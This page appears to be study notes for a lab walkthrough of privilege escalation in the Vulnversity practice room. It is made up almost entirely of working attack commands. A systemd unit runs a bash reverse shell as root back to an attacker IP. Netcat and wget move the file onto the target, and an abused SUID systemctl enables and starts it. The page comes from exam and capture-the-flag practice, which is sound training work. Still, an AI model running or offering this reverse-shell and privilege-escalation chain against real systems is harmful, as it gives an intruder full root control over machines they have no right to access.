https://alvinsmith.gitbook.io/progressive-oscp/untitled/vulnversity-privilege-escalation
[Unit]
Description=roooooooooot
[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/KaliIP/9999 0>&1'
[Install]
WantedBy=multi-user.target
find / -type f -maxdepth 2 -writable
or
find / -type d -maxdepth 2 -writable
nc -vl 44444 > root.service
nc -n TargetIP 44444 < root.service
nc -lvnp 9999
/bin/systemctl enable /dev/shm/root.service
Created symlink from /etc/systemd/system/multi-user.target.wants/root.service to /dev/shm/root.service
Created symlink from /etc/systemd/system/root.service -> /dev/shm/root.service
/bin/systemctl start root
Cheers
https://gtfobins.github.io/gtfobins/systemctl/#suid
https://stackoverflow.com/questions/2491985/find-all-writable-files-in-the-current-directory
https://www.maketecheasier.com/netcat-transfer-files-between-linux-computers/
Easy method to get the root.service file onto the compromised server if you already have a nc reverse shell running (ahem, Vulnversity room) - serve it from your attacker machine using python http.server, then
wget
it in the reverse shell you already got.Find a writable directory on the compromised server by running:
find / -type d -maxdepth 2 -writable
cd into it
Run a python http.server on your attacker machine in the directory that has your root.service file:
python3 -m http.server 8000
Go back to your nc reverse shell, and
wget
that sucker from your attacker machine. Checkifconfig
orhostname -I
for your attacker machine IP address.wget http://YOUR-IP:8000/root.service
(for Vulnversity, I used the Internal Virtual IP)
Voila!